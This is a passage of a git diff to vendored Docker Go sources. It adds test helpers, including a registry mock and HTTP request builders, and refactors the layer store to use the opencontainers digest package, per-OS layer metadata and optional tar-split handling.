a/vendor/github.com/docker/docker/internal/test/registry/registry_mock.go b/vendor/github.com/docker/docker/internal/test/registry/registry_mock.go new file mode 100644 index 0000000000..d139401a62 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/registry/registry_mock.go @@ -0,0 +1,71 @@ +package registry // import "github.com/docker/docker/internal/test/registry" + +import ( + "net/http" + "net/http/httptest" + "regexp" + "strings" + "sync" + + "github.com/docker/docker/internal/test" +) + +type handlerFunc func(w http.ResponseWriter, r *http.Request) + +// Mock represent a registry mock +type Mock struct { + server *httptest.Server + hostport string + handlers map[string]handlerFunc + mu sync.Mutex +} + +// RegisterHandler register the specified handler for the registry mock +func (tr *Mock) RegisterHandler(path string, h handlerFunc) { + tr.mu.Lock() + defer tr.mu.Unlock() + tr.handlers[path] = h +} + +// NewMock creates a registry mock +func NewMock(t testingT) (*Mock, error) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + testReg := &Mock{handlers: make(map[string]handlerFunc)} + + ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + url := r.URL.String() + + var matched bool + var err error + for re, function := range testReg.handlers { + matched, err = regexp.MatchString(re, url) + if err != nil { + t.Fatal("Error with handler regexp") + } + if matched { + function(w, r) + break + } + } + + if !matched { + t.Fatalf("Unable to match %s with regexp", url) + } + })) + + testReg.server = ts + testReg.hostport = strings.Replace(ts.URL, "http://", "", 1) + return testReg, nil +} + +// URL returns the url of the registry +func (tr *Mock) URL() string { + return tr.hostport +} + +// Close closes mock and releases resources +func (tr *Mock) Close() { + tr.server.Close() +} diff --git a/vendor/github.com/docker/docker/integration-cli/npipe.go b/vendor/github.com/docker/docker/internal/test/request/npipe.go similarity index 91% rename from vendor/github.com/docker/docker/integration-cli/npipe.go rename to vendor/github.com/docker/docker/internal/test/request/npipe.go index fa531a1b4d..e6ab03945e 100644 --- a/vendor/github.com/docker/docker/integration-cli/npipe.go +++ b/vendor/github.com/docker/docker/internal/test/request/npipe.go @@ -1,6 +1,6 @@ // +build !windows -package main +package request import ( "net" diff --git a/vendor/github.com/docker/docker/integration-cli/npipe_windows.go b/vendor/github.com/docker/docker/internal/test/request/npipe_windows.go similarity index 91% rename from vendor/github.com/docker/docker/integration-cli/npipe_windows.go rename to vendor/github.com/docker/docker/internal/test/request/npipe_windows.go index 4fd735f2db..a268aac922 100644 --- a/vendor/github.com/docker/docker/integration-cli/npipe_windows.go +++ b/vendor/github.com/docker/docker/internal/test/request/npipe_windows.go @@ -1,4 +1,4 @@ -package main +package request import ( "net" diff --git a/vendor/github.com/docker/docker/internal/test/request/ops.go b/vendor/github.com/docker/docker/internal/test/request/ops.go new file mode 100644 index 0000000000..c85308c476 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/request/ops.go @@ -0,0 +1,78 @@ +package request + +import ( + "bytes" + "encoding/json" + "io" + "io/ioutil" + "net/http" + "strings" +) + +// Options defines request options, like request modifiers and which host to target +type Options struct { + host string + requestModifiers []func(*http.Request) error +} + +// Host creates a modifier that sets the specified host as the request URL host +func Host(host string) func(*Options) { + return func(o *Options) { + o.host = host + } +} + +// With adds a request modifier to the options +func With(f func(*http.Request) error) func(*Options) { + return func(o *Options) { + o.requestModifiers = append(o.requestModifiers, f) + } +} + +// Method creates a modifier that sets the specified string as the request method +func Method(method string) func(*Options) { + return With(func(req *http.Request) error { + req.Method = method + return nil + }) +} + +// RawString sets the specified string as body for the request +func RawString(content string) func(*Options) { + return RawContent(ioutil.NopCloser(strings.NewReader(content))) +} + +// RawContent sets the specified reader as body for the request +func RawContent(reader io.ReadCloser) func(*Options) { + return With(func(req *http.Request) error { + req.Body = reader + return nil + }) +} + +// ContentType sets the specified Content-Type request header +func ContentType(contentType string) func(*Options) { + return With(func(req *http.Request) error { + req.Header.Set("Content-Type", contentType) + return nil + }) +} + +// JSON sets the Content-Type request header to json +func JSON(o *Options) { + ContentType("application/json")(o) +} + +// JSONBody creates a modifier that encodes the specified data to a JSON string and set it as request body. It also sets +// the Content-Type header of the request. +func JSONBody(data interface{}) func(*Options) { + return With(func(req *http.Request) error { + jsonData := bytes.NewBuffer(nil) + if err := json.NewEncoder(jsonData).Encode(data); err != nil { + return err + } + req.Body = ioutil.NopCloser(jsonData) + req.Header.Set("Content-Type", "application/json") + return nil + }) +} diff --git a/vendor/github.com/docker/docker/internal/test/request/request.go b/vendor/github.com/docker/docker/internal/test/request/request.go new file mode 100644 index 0000000000..1986d370f1 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/request/request.go @@ -0,0 +1,218 @@ +package request // import "github.com/docker/docker/internal/test/request" + +import ( + "context" + "crypto/tls" + "fmt" + "io" + "io/ioutil" + "net" + "net/http" + "net/url" + "os" + "path/filepath" + "time" + + "github.com/docker/docker/client" + "github.com/docker/docker/internal/test" + "github.com/docker/docker/internal/test/environment" + "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/go-connections/sockets" + "github.com/docker/go-connections/tlsconfig" + "github.com/pkg/errors" + "gotest.tools/assert" +) + +// NewAPIClient returns a docker API client configured from environment variables +func NewAPIClient(t assert.TestingT, ops ...func(*client.Client) error) client.APIClient { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + ops = append([]func(*client.Client) error{client.FromEnv}, ops...) + clt, err := client.NewClientWithOpts(ops...) + assert.NilError(t, err) + return clt +} + +// DaemonTime provides the current time on the daemon host +func DaemonTime(ctx context.Context, t assert.TestingT, client client.APIClient, testEnv *environment.Execution) time.Time { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + if testEnv.IsLocalDaemon() { + return time.Now() + } + + info, err := client.Info(ctx) + assert.NilError(t, err) + + dt, err := time.Parse(time.RFC3339Nano, info.SystemTime) + assert.NilError(t, err, "invalid time format in GET /info response") + return dt +} + +// DaemonUnixTime returns the current time on the daemon host with nanoseconds precision. +// It return the time formatted how the client sends timestamps to the server. +func DaemonUnixTime(ctx context.Context, t assert.TestingT, client client.APIClient, testEnv *environment.Execution) string { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + dt := DaemonTime(ctx, t, client, testEnv) + return fmt.Sprintf("%d.%09d", dt.Unix(), int64(dt.Nanosecond())) +} + +// Post creates and execute a POST request on the specified host and endpoint, with the specified request modifiers +func Post(endpoint string, modifiers ...func(*Options)) (*http.Response, io.ReadCloser, error) { + return Do(endpoint, append(modifiers, Method(http.MethodPost))...) +} + +// Delete creates and execute a DELETE request on the specified host and endpoint, with the specified request modifiers +func Delete(endpoint string, modifiers ...func(*Options)) (*http.Response, io.ReadCloser, error) { + return Do(endpoint, append(modifiers, Method(http.MethodDelete))...) +} + +// Get creates and execute a GET request on the specified host and endpoint, with the specified request modifiers +func Get(endpoint string, modifiers ...func(*Options)) (*http.Response, io.ReadCloser, error) { + return Do(endpoint, modifiers...) +} + +// Do creates and execute a request on the specified endpoint, with the specified request modifiers +func Do(endpoint string, modifiers ...func(*Options)) (*http.Response, io.ReadCloser, error) { + opts := &Options{ + host: DaemonHost(), + } + for _, mod := range modifiers { + mod(opts) + } + req, err := newRequest(endpoint, opts) + if err != nil { + return nil, nil, err + } + client, err := newHTTPClient(opts.host) + if err != nil { + return nil, nil, err + } + resp, err := client.Do(req) + var body io.ReadCloser + if resp != nil { + body = ioutils.NewReadCloserWrapper(resp.Body, func() error { + defer resp.Body.Close() + return nil + }) + } + return resp, body, err +} + +// ReadBody read the specified ReadCloser content and returns it +func ReadBody(b io.ReadCloser) ([]byte, error) { + defer b.Close() + return ioutil.ReadAll(b) +} + +// newRequest creates a new http Request to the specified host and endpoint, with the specified request modifiers +func newRequest(endpoint string, opts *Options) (*http.Request, error) { + hostURL, err := client.ParseHostURL(opts.host) + if err != nil { + return nil, errors.Wrapf(err, "failed parsing url %q", opts.host) + } + req, err := http.NewRequest("GET", endpoint, nil) + if err != nil { + return nil, errors.Wrap(err, "failed to create request") + } + + if os.Getenv("DOCKER_TLS_VERIFY") != "" { + req.URL.Scheme = "https" + } else { + req.URL.Scheme = "http" + } + req.URL.Host = hostURL.Host + + for _, config := range opts.requestModifiers { + if err := config(req); err != nil { + return nil, err + } + } + + return req, nil +} + +// newHTTPClient creates an http client for the specific host +// TODO: Share more code with client.defaultHTTPClient +func newHTTPClient(host string) (*http.Client, error) { + // FIXME(vdemeester) 10*time.Second timeout of SockRequest… ? + hostURL, err := client.ParseHostURL(host) + if err != nil { + return nil, err + } + transport := new(http.Transport) + if hostURL.Scheme == "tcp" && os.Getenv("DOCKER_TLS_VERIFY") != "" { + // Setup the socket TLS configuration. + tlsConfig, err := getTLSConfig() + if err != nil { + return nil, err + } + transport = &http.Transport{TLSClientConfig: tlsConfig} + } + transport.DisableKeepAlives = true + err = sockets.ConfigureTransport(transport, hostURL.Scheme, hostURL.Host) + return &http.Client{Transport: transport}, err +} + +func getTLSConfig() (*tls.Config, error) { + dockerCertPath := os.Getenv("DOCKER_CERT_PATH") + + if dockerCertPath == "" { + return nil, errors.New("DOCKER_TLS_VERIFY specified, but no DOCKER_CERT_PATH environment variable") + } + + option := &tlsconfig.Options{ + CAFile: filepath.Join(dockerCertPath, "ca.pem"), + CertFile: filepath.Join(dockerCertPath, "cert.pem"), + KeyFile: filepath.Join(dockerCertPath, "key.pem"), + } + tlsConfig, err := tlsconfig.Client(*option) + if err != nil { + return nil, err + } + + return tlsConfig, nil +} + +// DaemonHost return the daemon host string for this test execution +func DaemonHost() string { + daemonURLStr := "unix://" + opts.DefaultUnixSocket + if daemonHostVar := os.Getenv("DOCKER_HOST"); daemonHostVar != "" { + daemonURLStr = daemonHostVar + } + return daemonURLStr +} + +// SockConn opens a connection on the specified socket +func SockConn(timeout time.Duration, daemon string) (net.Conn, error) { + daemonURL, err := url.Parse(daemon) + if err != nil { + return nil, errors.Wrapf(err, "could not parse url %q", daemon) + } + + var c net.Conn + switch daemonURL.Scheme { + case "npipe": + return npipeDial(daemonURL.Path, timeout) + case "unix": + return net.DialTimeout(daemonURL.Scheme, daemonURL.Path, timeout) + case "tcp": + if os.Getenv("DOCKER_TLS_VERIFY") != "" { + // Setup the socket TLS configuration. + tlsConfig, err := getTLSConfig() + if err != nil { + return nil, err + } + dialer := &net.Dialer{Timeout: timeout} + return tls.DialWithDialer(dialer, daemonURL.Scheme, daemonURL.Host, tlsConfig) + } + return net.DialTimeout(daemonURL.Scheme, daemonURL.Host, timeout) + default: + return c, errors.Errorf("unknown scheme %v (%s)", daemonURL.Scheme, daemon) + } +} diff --git a/vendor/github.com/docker/docker/internal/testutil/helpers.go b/vendor/github.com/docker/docker/internal/testutil/helpers.go new file mode 100644 index 0000000000..38cd1693f5 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/testutil/helpers.go @@ -0,0 +1,17 @@ +package testutil // import "github.com/docker/docker/internal/testutil" + +import ( + "io" +) + +// DevZero acts like /dev/zero but in an OS-independent fashion. +var DevZero io.Reader = devZero{} + +type devZero struct{} + +func (d devZero) Read(p []byte) (n int, err error) { + for i := range p { + p[i] = 0 + } + return len(p), nil +} diff --git a/vendor/github.com/docker/docker/internal/testutil/stringutils.go b/vendor/github.com/docker/docker/internal/testutil/stringutils.go new file mode 100644 index 0000000000..574aeb51f2 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/testutil/stringutils.go @@ -0,0 +1,14 @@ +package testutil // import "github.com/docker/docker/internal/testutil" + +import "math/rand" + +// GenerateRandomAlphaOnlyString generates an alphabetical random string with length n. +func GenerateRandomAlphaOnlyString(n int) string { + // make a really long string + letters := []byte("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ") + b := make([]byte, n) + for i := range b { + b[i] = letters[rand.Intn(len(letters))] + } + return string(b) +} diff --git a/vendor/github.com/docker/docker/internal/testutil/stringutils_test.go b/vendor/github.com/docker/docker/internal/testutil/stringutils_test.go new file mode 100644 index 0000000000..753aac966d --- /dev/null +++ b/vendor/github.com/docker/docker/internal/testutil/stringutils_test.go @@ -0,0 +1,34 @@ +package testutil // import "github.com/docker/docker/internal/testutil" + +import ( + "testing" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func testLengthHelper(generator func(int) string, t *testing.T) { + expectedLength := 20 + s := generator(expectedLength) + assert.Check(t, is.Equal(expectedLength, len(s))) +} + +func testUniquenessHelper(generator func(int) string, t *testing.T) { + repeats := 25 + set := make(map[string]struct{}, repeats) + for i := 0; i < repeats; i = i + 1 { + str := generator(64) + assert.Check(t, is.Equal(64, len(str))) + _, ok := set[str] + assert.Check(t, !ok, "Random number is repeated") + set[str] = struct{}{} + } +} + +func TestGenerateRandomAlphaOnlyStringLength(t *testing.T) { + testLengthHelper(GenerateRandomAlphaOnlyString, t) +} + +func TestGenerateRandomAlphaOnlyStringUniqueness(t *testing.T) { + testUniquenessHelper(GenerateRandomAlphaOnlyString, t) +} diff --git a/vendor/github.com/docker/docker/layer/empty.go b/vendor/github.com/docker/docker/layer/empty.go index 3b6ffc82f7..c81c702140 100644 --- a/vendor/github.com/docker/docker/layer/empty.go +++ b/vendor/github.com/docker/docker/layer/empty.go @@ -1,4 +1,4 @@ -package layer +package layer // import "github.com/docker/docker/layer" import ( "archive/tar" @@ -54,3 +54,8 @@ func (el *emptyLayer) DiffSize() (size int64, err error) { func (el *emptyLayer) Metadata() (map[string]string, error) { return make(map[string]string), nil } + +// IsEmpty returns true if the layer is an EmptyLayer +func IsEmpty(diffID DiffID) bool { + return diffID == DigestSHA256EmptyTar +} diff --git a/vendor/github.com/docker/docker/layer/empty_test.go b/vendor/github.com/docker/docker/layer/empty_test.go index c22da7665d..ec9fbc1a3c 100644 --- a/vendor/github.com/docker/docker/layer/empty_test.go +++ b/vendor/github.com/docker/docker/layer/empty_test.go @@ -1,15 +1,15 @@ -package layer +package layer // import "github.com/docker/docker/layer" import ( "io" "testing" - "github.com/docker/distribution/digest" + "github.com/opencontainers/go-digest" ) func TestEmptyLayer(t *testing.T) { if EmptyLayer.ChainID() != ChainID(DigestSHA256EmptyTar) { - t.Fatal("wrong ID for empty layer") + t.Fatal("wrong ChainID for empty layer") } if EmptyLayer.DiffID() != DigestSHA256EmptyTar { @@ -28,12 +28,18 @@ func TestEmptyLayer(t *testing.T) { t.Fatal("expected zero diffsize for empty layer") } + meta, err := EmptyLayer.Metadata() + + if len(meta) != 0 || err != nil { + t.Fatal("expected zero length metadata for empty layer") + } + tarStream, err := EmptyLayer.TarStream() if err != nil { t.Fatalf("error streaming tar for empty layer: %v", err) } - digester := digest.Canonical.New() + digester := digest.Canonical.Digester() _, err = io.Copy(digester.Hash(), tarStream) if err != nil { diff --git a/vendor/github.com/docker/docker/layer/filestore.go b/vendor/github.com/docker/docker/layer/filestore.go index 42b45556e3..208a0c3a85 100644 --- a/vendor/github.com/docker/docker/layer/filestore.go +++ b/vendor/github.com/docker/docker/layer/filestore.go @@ -1,9 +1,8 @@ -package layer +package layer // import "github.com/docker/docker/layer" import ( "compress/gzip" "encoding/json" - "errors" "fmt" "io" "io/ioutil" @@ -13,10 +12,11 @@ import ( "strconv" "strings" - "github.com/Sirupsen/logrus" "github.com/docker/distribution" - "github.com/docker/distribution/digest" "github.com/docker/docker/pkg/ioutils" + "github.com/opencontainers/go-digest" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) var ( @@ -37,10 +37,10 @@ type fileMetadataTransaction struct { ws *ioutils.AtomicWriteSet } -// NewFSMetadataStore returns an instance of a metadata store +// newFSMetadataStore returns an instance of a metadata store // which is backed by files on disk using the provided root // as the root of metadata files. -func NewFSMetadataStore(root string) (MetadataStore, error) { +func newFSMetadataStore(root string) (*fileMetadataStore, error) { if err := os.MkdirAll(root, 0700); err != nil { return nil, err } @@ -66,7 +66,7 @@ func (fms *fileMetadataStore) getMountFilename(mount, filename string) string { return filepath.Join(fms.getMountDirectory(mount), filename) } -func (fms *fileMetadataStore) StartTransaction() (MetadataTransaction, error) { +func (fms *fileMetadataStore) StartTransaction() (*fileMetadataTransaction, error) { tmpDir := filepath.Join(fms.root, "tmp") if err := os.MkdirAll(tmpDir, 0755); err != nil { return nil, err @@ -165,7 +165,7 @@ func (fms *fileMetadataStore) GetParent(layer ChainID) (ChainID, error) { return "", err } - dgst, err := digest.ParseDigest(strings.TrimSpace(string(content))) + dgst, err := digest.Parse(strings.TrimSpace(string(content))) if err != nil { return "", err } @@ -179,7 +179,7 @@ func (fms *fileMetadataStore) GetDiffID(layer ChainID) (DiffID, error) { return "", err } - dgst, err := digest.ParseDigest(strings.TrimSpace(string(content))) + dgst, err := digest.Parse(strings.TrimSpace(string(content))) if err != nil { return "", err } @@ -194,8 +194,8 @@ func (fms *fileMetadataStore) GetCacheID(layer ChainID) (string, error) { } content := strings.TrimSpace(string(contentBytes)) - if !stringIDRegexp.MatchString(content) { - return "", errors.New("invalid cache id value") + if content == "" { + return "", errors.Errorf("invalid cache id value") } return content, nil @@ -226,6 +226,7 @@ func (fms *fileMetadataStore) TarSplitReader(layer ChainID) (io.ReadCloser, erro } f, err := gzip.NewReader(fz) if err != nil { + fz.Close() return nil, err } @@ -296,7 +297,7 @@ func (fms *fileMetadataStore) GetMountParent(mount string) (ChainID, error) { return "", err } - dgst, err := digest.ParseDigest(strings.TrimSpace(string(content))) + dgst, err := digest.Parse(strings.TrimSpace(string(content))) if err != nil { return "", err } diff --git a/vendor/github.com/docker/docker/layer/filestore_test.go b/vendor/github.com/docker/docker/layer/filestore_test.go index 55e3b28530..498379e37f 100644 --- a/vendor/github.com/docker/docker/layer/filestore_test.go +++ b/vendor/github.com/docker/docker/layer/filestore_test.go @@ -1,4 +1,4 @@ -package layer +package layer // import "github.com/docker/docker/layer" import ( "fmt" @@ -10,7 +10,7 @@ import ( "syscall" "testing" - "github.com/docker/distribution/digest" + "github.com/opencontainers/go-digest" ) func randomLayerID(seed int64) ChainID { @@ -24,12 +24,12 @@ func newFileMetadataStore(t *testing.T) (*fileMetadataStore, string, func()) { if err != nil { t.Fatal(err) } - fms, err := NewFSMetadataStore(td) + fms, err := newFSMetadataStore(td) if err != nil { t.Fatal(err) } - return fms.(*fileMetadataStore), td, func() { + return fms, td, func() { if err := os.RemoveAll(td); err != nil { t.Logf("Failed to cleanup %q: %s", td, err) } diff --git a/vendor/github.com/docker/docker/layer/filestore_unix.go b/vendor/github.com/docker/docker/layer/filestore_unix.go new file mode 100644 index 0000000000..68e7f90779 --- /dev/null +++ b/vendor/github.com/docker/docker/layer/filestore_unix.go @@ -0,0 +1,15 @@ +// +build !windows + +package layer // import "github.com/docker/docker/layer" + +import "runtime" + +// setOS writes the "os" file to the layer filestore +func (fm *fileMetadataTransaction) setOS(os string) error { + return nil +} + +// getOS reads the "os" file from the layer filestore +func (fms *fileMetadataStore) getOS(layer ChainID) (string, error) { + return runtime.GOOS, nil +} diff --git a/vendor/github.com/docker/docker/layer/filestore_windows.go b/vendor/github.com/docker/docker/layer/filestore_windows.go new file mode 100644 index 0000000000..cecad426c8 --- /dev/null +++ b/vendor/github.com/docker/docker/layer/filestore_windows.go @@ -0,0 +1,35 @@ +package layer // import "github.com/docker/docker/layer" + +import ( + "fmt" + "io/ioutil" + "os" + "strings" +) + +// setOS writes the "os" file to the layer filestore +func (fm *fileMetadataTransaction) setOS(os string) error { + if os == "" { + return nil + } + return fm.ws.WriteFile("os", []byte(os), 0644) +} + +// getOS reads the "os" file from the layer filestore +func (fms *fileMetadataStore) getOS(layer ChainID) (string, error) { + contentBytes, err := ioutil.ReadFile(fms.getLayerFilename(layer, "os")) + if err != nil { + // For backwards compatibility, the os file may not exist. Default to "windows" if missing. + if os.IsNotExist(err) { + return "windows", nil + } + return "", err + } + content := strings.TrimSpace(string(contentBytes)) + + if content != "windows" && content != "linux" { + return "", fmt.Errorf("invalid operating system value: %s", content) + } + + return content, nil +} diff --git a/vendor/github.com/docker/docker/layer/layer.go b/vendor/github.com/docker/docker/layer/layer.go index ec1d4346d7..d0c7fa8608 100644 --- a/vendor/github.com/docker/docker/layer/layer.go +++ b/vendor/github.com/docker/docker/layer/layer.go @@ -7,16 +7,17 @@ // read-only and writable layers. The exported // tar data for a read-only layer should match // the tar used to create the layer. -package layer +package layer // import "github.com/docker/docker/layer" import ( "errors" "io" - "github.com/Sirupsen/logrus" "github.com/docker/distribution" - "github.com/docker/distribution/digest" "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/containerfs" + "github.com/opencontainers/go-digest" + "github.com/sirupsen/logrus" ) var ( @@ -52,8 +53,8 @@ var ( ErrMaxDepthExceeded = errors.New("max depth exceeded") // ErrNotSupported is used when the action is not supported - // on the current platform - ErrNotSupported = errors.New("not support on this platform") + // on the current host operating system. + ErrNotSupported = errors.New("not support on this host operating system") ) // ChainID is the content-addressable ID of a layer. @@ -126,7 +127,7 @@ type RWLayer interface { // Mount mounts the RWLayer and returns the filesystem path // the to the writable layer. - Mount(mountLabel string) (string, error) + Mount(mountLabel string) (containerfs.ContainerFS, error) // Unmount unmounts the RWLayer. This should be called // for every mount. If there are multiple mount calls @@ -167,7 +168,14 @@ type Metadata struct { // writable mount. Changes made here will // not be included in the Tar stream of the // RWLayer. -type MountInit func(root string) error +type MountInit func(root containerfs.ContainerFS) error + +// CreateRWLayerOpts contains optional arguments to be passed to CreateRWLayer +type CreateRWLayerOpts struct { + MountLabel string + InitFunc MountInit + StorageOpt map[string]string +} // Store represents a backend for managing both // read-only and read-write layers. @@ -177,7 +185,7 @@ type Store interface { Map() map[ChainID]Layer Release(Layer) ([]Metadata, error) - CreateRWLayer(id string, parent ChainID, mountLabel string, initFunc MountInit, storageOpt map[string]string) (RWLayer, error) + CreateRWLayer(id string, parent ChainID, opts *CreateRWLayerOpts) (RWLayer, error) GetRWLayer(id string) (RWLayer, error) GetMountID(id string) (string, error) ReleaseRWLayer(RWLayer) ([]Metadata, error) @@ -193,52 +201,6 @@ type DescribableStore interface { RegisterWithDescriptor(io.Reader, ChainID, distribution.Descriptor) (Layer, error) } -// MetadataTransaction represents functions for setting layer metadata -// with a single transaction. -type MetadataTransaction interface { - SetSize(int64) error - SetParent(parent ChainID) error - SetDiffID(DiffID) error - SetCacheID(string) error - SetDescriptor(distribution.Descriptor) error - TarSplitWriter(compressInput bool) (io.WriteCloser, error) - - Commit(ChainID) error - Cancel() error - String() string -} - -// MetadataStore represents a backend for persisting -// metadata about layers and providing the metadata -// for restoring a Store. -type MetadataStore interface { - // StartTransaction starts an update for new metadata - // which will be used to represent an ID on commit. - StartTransaction() (MetadataTransaction, error) - - GetSize(ChainID) (int64, error) - GetParent(ChainID) (ChainID, error) - GetDiffID(ChainID) (DiffID, error) - GetCacheID(ChainID) (string, error) - GetDescriptor(ChainID) (distribution.Descriptor, error) - TarSplitReader(ChainID) (io.ReadCloser, error) - - SetMountID(string, string) error - SetInitID(string, string) error - SetMountParent(string, ChainID) error - - GetMountID(string) (string, error) - GetInitID(string) (string, error) - GetMountParent(string) (ChainID, error) - - // List returns the full list of referenced - // read-only and read-write layers - List() ([]ChainID, []string, error) - - Remove(ChainID) error - RemoveMount(string) error -} - // CreateChainID returns ID for a layerDigest slice func CreateChainID(dgsts []DiffID) ChainID { return createChainIDFromParent("", dgsts...) diff --git a/vendor/github.com/docker/docker/layer/layer_store.go b/vendor/github.com/docker/docker/layer/layer_store.go index 1a1ff9fe59..c1fbf85091 100644 --- a/vendor/github.com/docker/docker/layer/layer_store.go +++ b/vendor/github.com/docker/docker/layer/layer_store.go @@ -1,4 +1,4 @@ -package layer +package layer // import "github.com/docker/docker/layer" import ( "errors" @@ -7,13 +7,14 @@ import ( "io/ioutil" "sync" - "github.com/Sirupsen/logrus" "github.com/docker/distribution" - "github.com/docker/distribution/digest" "github.com/docker/docker/daemon/graphdriver" "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/plugingetter" "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/system" + "github.com/opencontainers/go-digest" + "github.com/sirupsen/logrus" "github.com/vbatts/tar-split/tar/asm" "github.com/vbatts/tar-split/tar/storage" ) @@ -26,62 +27,76 @@ import ( const maxLayerDepth = 125 type layerStore struct { - store MetadataStore - driver graphdriver.Driver + store *fileMetadataStore + driver graphdriver.Driver + useTarSplit bool layerMap map[ChainID]*roLayer layerL sync.Mutex mounts map[string]*mountedLayer mountL sync.Mutex + os string } // StoreOptions are the options used to create a new Store instance type StoreOptions struct { - StorePath string + Root string MetadataStorePathTemplate string GraphDriver string GraphDriverOptions []string - UIDMaps []idtools.IDMap - GIDMaps []idtools.IDMap + IDMappings *idtools.IDMappings PluginGetter plugingetter.PluginGetter ExperimentalEnabled bool + OS string } // NewStoreFromOptions creates a new Store instance func NewStoreFromOptions(options StoreOptions) (Store, error) { driver, err := graphdriver.New(options.GraphDriver, options.PluginGetter, graphdriver.Options{ - Root: options.StorePath, + Root: options.Root, DriverOptions: options.GraphDriverOptions, - UIDMaps: options.UIDMaps, - GIDMaps: options.GIDMaps, + UIDMaps: options.IDMappings.UIDs(), + GIDMaps: options.IDMappings.GIDs(), ExperimentalEnabled: options.ExperimentalEnabled, }) if err != nil { return nil, fmt.Errorf("error initializing graphdriver: %v", err) } - logrus.Debugf("Using graph driver %s", driver) + logrus.Debugf("Initialized graph driver %s", driver) - fms, err := NewFSMetadataStore(fmt.Sprintf(options.MetadataStorePathTemplate, driver)) - if err != nil { - return nil, err - } + root := fmt.Sprintf(options.MetadataStorePathTemplate, driver) - return NewStoreFromGraphDriver(fms, driver) + return newStoreFromGraphDriver(root, driver, options.OS) } -// NewStoreFromGraphDriver creates a new Store instance using the provided +// newStoreFromGraphDriver creates a new Store instance using the provided // metadata store and graph driver. The metadata store will be used to restore // the Store. -func NewStoreFromGraphDriver(store MetadataStore, driver graphdriver.Driver) (Store, error) { +func newStoreFromGraphDriver(root string, driver graphdriver.Driver, os string) (Store, error) { + if !system.IsOSSupported(os) { + return nil, fmt.Errorf("failed to initialize layer store as operating system '%s' is not supported", os) + } + caps := graphdriver.Capabilities{} + if capDriver, ok := driver.(graphdriver.CapabilityDriver); ok { + caps = capDriver.Capabilities() + } + + ms, err := newFSMetadataStore(root) + if err != nil { + return nil, err + } + ls := &layerStore{ - store: store, - driver: driver, - layerMap: map[ChainID]*roLayer{}, - mounts: map[string]*mountedLayer{}, + store: ms, + driver: driver, + layerMap: map[ChainID]*roLayer{}, + mounts: map[string]*mountedLayer{}, + useTarSplit: !caps.ReproducesExactDiffs, + os: os, } - ids, mounts, err := store.List() + ids, mounts, err := ms.List() if err != nil { return nil, err } @@ -106,6 +121,10 @@ func NewStoreFromGraphDriver(store MetadataStore, driver graphdriver.Driver) (St return ls, nil } +func (ls *layerStore) Driver() graphdriver.Driver { + return ls.driver +} + func (ls *layerStore) loadLayer(layer ChainID) (*roLayer, error) { cl, ok := ls.layerMap[layer] if ok { @@ -137,6 +156,15 @@ func (ls *layerStore) loadLayer(layer ChainID) (*roLayer, error) { return nil, fmt.Errorf("failed to get descriptor for %s: %s", layer, err) } + os, err := ls.store.getOS(layer) + if err != nil { + return nil, fmt.Errorf("failed to get operating system for %s: %s", layer, err) + } + + if os != ls.os { + return nil, fmt.Errorf("failed to load layer with os %s into layerstore for %s", os, ls.os) + } + cl = &roLayer{ chainID: layer, diffID: diff, @@ -203,22 +231,25 @@ func (ls *layerStore) loadMount(mount string) error { return nil } -func (ls *layerStore) applyTar(tx MetadataTransaction, ts io.Reader, parent string, layer *roLayer) error { - digester := digest.Canonical.New() +func (ls *layerStore) applyTar(tx *fileMetadataTransaction, ts io.Reader, parent string, layer *roLayer) error { + digester := digest.Canonical.Digester() tr := io.TeeReader(ts, digester.Hash()) - tsw, err := tx.TarSplitWriter(true) - if err != nil { - return err - } - metaPacker := storage.NewJSONPacker(tsw) - defer tsw.Close() + rdr := tr + if ls.useTarSplit { + tsw, err := tx.TarSplitWriter(true) + if err != nil { + return err + } + metaPacker := storage.NewJSONPacker(tsw) + defer tsw.Close() - // we're passing nil here for the file putter, because the ApplyDiff will - // handle the extraction of the archive - rdr, err := asm.NewInputTarStream(tr, metaPacker, nil) - if err != nil { - return err + // we're passing nil here for the file putter, because the ApplyDiff will + // handle the extraction of the archive + rdr, err = asm.NewInputTarStream(tr, metaPacker, nil) + if err != nil { + return err + } } applySize, err := ls.driver.ApplyDiff(layer.cacheID, parent, rdr) @@ -248,6 +279,7 @@ func (ls *layerStore) registerWithDescriptor(ts io.Reader, parent ChainID, descr var err error var pid string var p *roLayer + if string(parent) != "" { p = ls.get(parent) if p == nil { @@ -378,7 +410,6 @@ func (ls *layerStore) deleteLayer(layer *roLayer, metadata *Metadata) error { if err != nil { return err } - err = ls.store.Remove(layer.chainID) if err != nil { return err @@ -445,7 +476,19 @@ func (ls *layerStore) Release(l Layer) ([]Metadata, error) { return ls.releaseLayer(layer) } -func (ls *layerStore) CreateRWLayer(name string, parent ChainID, mountLabel string, initFunc MountInit, storageOpt map[string]string) (RWLayer, error) { +func (ls *layerStore) CreateRWLayer(name string, parent ChainID, opts *CreateRWLayerOpts) (RWLayer, error) { + var ( + storageOpt map[string]string + initFunc MountInit + mountLabel string + ) + + if opts != nil { + mountLabel = opts.MountLabel + storageOpt = opts.StorageOpt + initFunc = opts.InitFunc + } + ls.mountL.Lock() defer ls.mountL.Unlock() m, ok := ls.mounts[name] @@ -496,7 +539,6 @@ func (ls *layerStore) CreateRWLayer(name string, parent ChainID, mountLabel stri if err = ls.driver.CreateReadWrite(m.mountID, pid, createOpts); err != nil { return nil, err } - if err = ls.saveMount(m); err != nil { return nil, err } @@ -628,6 +670,34 @@ func (ls *layerStore) initMount(graphID, parent, mountLabel string, initFunc Mou return initID, nil } +func (ls *layerStore) getTarStream(rl *roLayer) 